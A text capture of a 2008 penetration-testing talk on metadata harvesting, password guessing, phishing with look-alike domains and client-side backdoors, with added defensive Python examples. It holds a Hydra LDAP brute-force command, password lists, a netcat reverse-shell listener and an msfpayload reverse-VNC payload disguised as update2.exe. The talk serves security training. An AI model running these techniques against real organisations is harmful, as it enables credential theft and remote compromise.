8/14/2019 Beyond Front-Line Exploits
http://slidepdf.com/reader/full/beyond-front-line-exploits 1/44
Beyond Front-Line Exploits: Tips and Tools for Comprehensive Penetration Testing

Lenny Zeltser
Security Consultant, SAVVIS
Senior Faculty Member, SANS Institute
Handler, SANS Internet Storm Center
August 2008
Pen testing usually involves locating and exploiting software bugs.
© 2008 Lenny Zeltser
The attack surface of many server environments is very limited.
What if you couldn't exploit any software vulnerabilities?
Consider 4 techniques for going beyond the front-line approach:
1. Data in plain sight
2. Remote password-guessing
3. Social engineering
4. Client-side backdoors
#1: Data in plain sight
site:example.com filetype:pdf
site:example.com filetype:ppt
site:example.com filetype:doc
libextractor
$ extract sample.pdf sample.ppt sample.doc
$ extract overview.ppt
paragraph count - 2
last saved by - Lenny Zeltser
title - Project overview
creation date - 2008-03-14T01:58:53Z
creator - John Smith
word count - 5
date - 2008-03-14T04:56:57Z
generator - Microsoft Office PowerPoint
Google + libextractor = Metagoofil
$ metagoofil.py -d example.com -f all -l 10 -o o.html -t o

$ metagoofil.py -d zeltser.com -f all -l 10 -o o.html -t o
[+] Searching in zeltser.com for: pdf
[+] Total results in google: 11
[ 1/11 ] http://www.zeltser.com/.../impersonation-attacks.pdf
[ 2/11 ] http://www.zeltser.com/.../multi-firewall.pdf
...
[+] Searching results: 0
[ 1/1 ] http://www.zeltser.com/.../malicious-agents.ppt
Usernames found:
================
Lenny Zeltser (www.zeltser.com)
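The metadata that libextractor and Metagoofil pull out of published documents is the same metadata a publisher can audit before posting. The following is an added example, not code from the slides or from libextractor: a minimal parser for the classic PDF /Info dictionary (uncompressed, parenthesised string values only; XMP streams are out of scope) run over a constructed sample so that leaked author and software details can be caught before a document goes public.

```python
"""Audit a PDF's Info dictionary for identifying metadata.

Added example, not from the original slides. Handles only the classic
/Info dictionary with literal (parenthesised) strings, which is what
Office-generated PDFs of the period wrote; XMP metadata is not parsed.
"""
import re

# Keys that reveal people or software versions (cf. libextractor's
# "last saved by", "creator" and "generator" fields on the slide).
SENSITIVE_KEYS = ("Author", "Creator", "Producer")

# /Key (value) where value may contain escaped parentheses: \( \) \\
_KV = re.compile(rb"/(Author|Creator|Producer|Title|Subject|CreationDate|ModDate)"
                 rb"\s*\(((?:\\.|[^\\)])*)\)")


def pdf_info(data: bytes) -> dict:
    """Return the literal-string entries of the Info dictionary (first wins)."""
    found = {}
    for key, raw in _KV.findall(data):
        value = re.sub(rb"\\(.)", rb"\1", raw).decode("latin-1")  # unescape
        found.setdefault(key.decode(), value)
    return found


def leaks(data: bytes) -> list:
    """Sensitive keys that carry a non-empty value, in SENSITIVE_KEYS order."""
    info = pdf_info(data)
    return [k for k in SENSITIVE_KEYS if info.get(k, "").strip()]


# Constructed sample: the metadata object of an Office-generated PDF.
SAMPLE_PDF = rb"""%PDF-1.4
1 0 obj << /Title (Project overview) /Author (John Smith)
/Subject (Q3 \(draft\)) /Creator (Microsoft Office PowerPoint)
/Producer (Microsoft PowerPoint 2007)
/CreationDate (D:20080314015853Z) /ModDate (D:20080314045657Z) >> endobj
trailer << /Info 1 0 R >>
%%EOF
"""
# The same file after the author field has been blanked.
SCRUBBED_PDF = SAMPLE_PDF.replace(b"(John Smith)", b"()")

if __name__ == "__main__":
    for key, value in pdf_info(SAMPLE_PDF).items():
        print(f"{key:13s} {value}")
    print("leaking keys:", leaks(SAMPLE_PDF))
    print("after scrub: ", leaks(SCRUBBED_PDF))
```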
Finding documents via Maltego
Finding interesting files via Maltego
#2: Remote Password-Guessing
Potential usernames: ranked word lists
http://www.census.gov/genealogy/names/names_files.html

Top Last Names   Top Female First Names   Top Male First Names
smith            mary                     james
johnson          patricia                 john
williams         linda                    robert
jones            barbara                  michael
brown            elizabeth                william
davis            jennifer                 david
miller           maria                    richard
Potential usernames: theHarvester
$ theHarvester.py -d example.com -l 3 -b google
$ theHarvester.py -d example.com -l 3 -b linkedin
Mark Jameson
James Quieras
Robert Marcus
$ theHarvester.py -d example.com -l 3 -b pgp
Wrong username vs. password
Confirm usernames with Brutus by varying only usernames.
[Figure: one password, many usernames]
A head-on brute-force password attack will probably fail.
Create a short list of potential passwords.
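The two slides above describe the same logon pattern from the attacker's side: a few candidate passwords tried across many confirmed usernames, which per-account lockout does not stop. As an added example (not from the slides, and using a constructed log format), the detector below groups failed logons by source address inside a sliding window and flags sources that touch many distinct accounts with only a few attempts each, while leaving a single-account brute force and an ordinary mistyped password unflagged.

```python
"""Flag password spraying in authentication logs (added example, not from the
slides). Lockout stops a head-on brute force (many passwords, one account)
but not one password tried across many accounts, so failed logons are grouped
per source inside a sliding window. The log line format is constructed."""
from collections import defaultdict
from datetime import datetime, timedelta
import re

LINE = re.compile(r"^(\S+) LOGIN_FAIL user=(\S+) src=(\S+)")


def parse(lines):
    """Yield (timestamp, user, src) for each failed-logon record."""
    for line in lines:
        m = LINE.match(line)
        if m:
            ts = datetime.fromisoformat(m.group(1).replace("Z", "+00:00"))
            yield ts, m.group(2).lower(), m.group(3)


def spray_sources(lines, window=timedelta(minutes=30), min_users=5, max_tries=2):
    """Map src -> number of distinct accounts, for sources whose failures inside
    any window cover >= min_users accounts with <= max_tries attempts each."""
    by_src = defaultdict(list)
    for ts, user, src in parse(lines):
        by_src[src].append((ts, user))
    flagged = {}
    for src, events in by_src.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            tries = defaultdict(int)
            for ts, user in events[i:]:
                if ts - start <= window:
                    tries[user] += 1
            if len(tries) >= min_users and max(tries.values()) <= max_tries:
                flagged[src] = len(tries)
                break
    return flagged


# Constructed sample: a spray, a single-account brute force, one mistyped password.
SAMPLE_LOG = """\
2008-03-14T09:00:01Z LOGIN_FAIL user=mary src=198.51.100.7
2008-03-14T09:01:02Z LOGIN_FAIL user=john src=198.51.100.7
2008-03-14T09:02:05Z LOGIN_FAIL user=patricia src=198.51.100.7
2008-03-14T09:03:09Z LOGIN_FAIL user=robert src=198.51.100.7
2008-03-14T09:04:11Z LOGIN_FAIL user=linda src=198.51.100.7
2008-03-14T09:00:30Z LOGIN_FAIL user=jsmith src=203.0.113.9
2008-03-14T09:00:31Z LOGIN_FAIL user=jsmith src=203.0.113.9
2008-03-14T09:00:32Z LOGIN_FAIL user=jsmith src=203.0.113.9
2008-03-14T09:10:00Z LOGIN_FAIL user=mary src=192.0.2.4
""".splitlines()
```

Running spray_sources(SAMPLE_LOG) reports only 198.51.100.7, with 5 accounts touched; the brute force against jsmith is left for a lockout rule.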
Some common generic passwords
password   baseball1   iloveyou    querty1     soccer
password1  football1   iloveyou1   querty123   windows
abc123     123456      monkey      bitch1      1qaz2wsx
123abc     123123      cookie123   flower      gospel
fuckyou    monkey1     miss4you    123qwe      superman1
fuckyou1   princess1   clumsy      manager     admin
Best results with a company-specific dictionary file
Briefly
Britain
British
brother
browser
Bugtraq
Bugbear
bundled
Password recovery mechanisms are weak links.
They often depend on the security of the email system.
Also, “secret question” recovery is a prime candidate for attack.
Letting users select their own questions is particularly weak.
Use LDAP if you find it: much faster authentication.
$ hydra -L users.txt -P passwords.txt ldap.example.com ldap2
Hydra v5.4 (c) 2006 by van Hauser / THC
Hydra (http://www.thc.org) 15 tasks, 26753 login tries
[DATA] attacking service ldap2 on port 389
[389][ldap] login: CN=Robert Marcus,OU=IT,O=ACME Example   password: Bugbear

$ k0ld -f users.txt -w passwords.txt -I -o out.txt -f 'cn=*' -h ldap.example.com
Brute-force Remote Desktop credentials with TSGrinder.
TSGrinder is slow, and requires an older Remote Desktop client (v5).
#3: Social engineering
Tricking employees into releasing information works too well.
Email phishing-style campaigns can obtain logon credentials.
ArGoSoft Mail Server Freeware helps relay spoofed email.
You can register a domain that resembles that of the target.
http://www.domaintools.com/domain-typo
xeample.com
eaxmple.com
exampe.net
exapmle.com
wwwexample.com
exampel.com
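The look-alike names above fall into a few mechanical classes (adjacent-letter swaps, a dropped letter, a missing dot after www, the same name under another TLD), which is why defenders enumerate them too, to pre-register or to watch for in mail and DNS logs. The generator below is an added example, not from the slides or from DomainTools; it reproduces every variant on the slide from example.com and makes no network lookups.

```python
"""Enumerate look-alike domains to register or monitor.

Added example, not from the original slides or DomainTools. Generates the
typo classes the slide's list shows; inputs are constructed and no DNS
lookups are made.
"""


def typo_domains(domain: str, tlds=("com", "net")) -> set:
    """Return look-alike names for a second-level domain such as example.com."""
    label, tld = domain.lower().split(".", 1)
    labels = set()
    # Adjacent-letter transposition: example -> xeample, eaxmple, exapmle, exampel
    for i in range(len(label) - 1):
        labels.add(label[:i] + label[i + 1] + label[i] + label[i + 2:])
    # Omitted letter: example -> xample, eample, ..., exampe
    for i in range(len(label)):
        labels.add(label[:i] + label[i + 1:])
    # Dropped dot after the www host label: wwwexample.com
    labels.add("www" + label)
    # Every label variant (and the real one) under each TLD of interest
    labels.add(label)
    variants = {f"{name}.{t}" for name in labels for t in set(tlds) | {tld}}
    variants.discard(domain.lower())  # the organisation's own name is not a typo
    return variants


def unexpected(domain: str, owned: set) -> set:
    """Look-alikes the organisation has not already registered itself."""
    return typo_domains(domain) - {d.lower() for d in owned}


if __name__ == "__main__":
    # Constructed: the organisation already holds one defensive registration.
    owned = {"example.com", "exampel.com"}
    for name in sorted(unexpected("example.com", owned)):
        print(name)
```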
Too many users will give up their logon credentials.
The site can also capture client-side details for follow-on attacks.
USER: jsmith
PASSWORD: plumlips
LOCAL IP: 192.168.2.144
REMOTE IP: 208.77.188.166
PORT: 61035
USER AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
PLUGINS: Move Media Player; QuickTime Plug-in 7.4.1; Mozilla Default Plug-in; RealJukebox NS Plugin; RealPlayer(tm) G2 LiveConnect-Enabled Plug-In (32-bit); Shockwave Flash; Java(TM) Platform SE 6 U2;
#4: Client-Side Backdoors
Keeping up with security patches on laptops and desktops is hard.
Tools such as Core Impact and Metasploit help target client-side vulnerabilities.
It may be more effective just to ask the user to install the backdoor.
The backdoor can connect to the attacking system via reverse shell.
C:\attacker> nc -l -p 80
Microsoft Windows [Version 6.0.6000]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.
C:\Windows\Temp> dir
...
Metasploit can generate stand-alone payloads. Example: Reverse-VNC.
$ msfpayload windows/vncinject/reverse_tcp LPORT=5544
LHOST=192.168.1.124 DisableCourtesyShell=True X >update2.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/vncinject/reverse_tcp
Length: 177
Options: LHOST=192.168.1.124,LPORT=5544,DisableCourtesyShell=True

$ msfcli exploit/multi/handler LPORT=5544
PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.124
DisableCourtesyShell=True E
Reverse-VNC can control a system even if it is behind a firewall.
A system compromise is just a means to an end.
Consider the previous scenarios when defining your rules of engagement.
These approaches increase the chances of a “successful” pen test:
1. Data in plain sight
2. Remote password-guessing
3. Social engineering
4. Client-side backdoors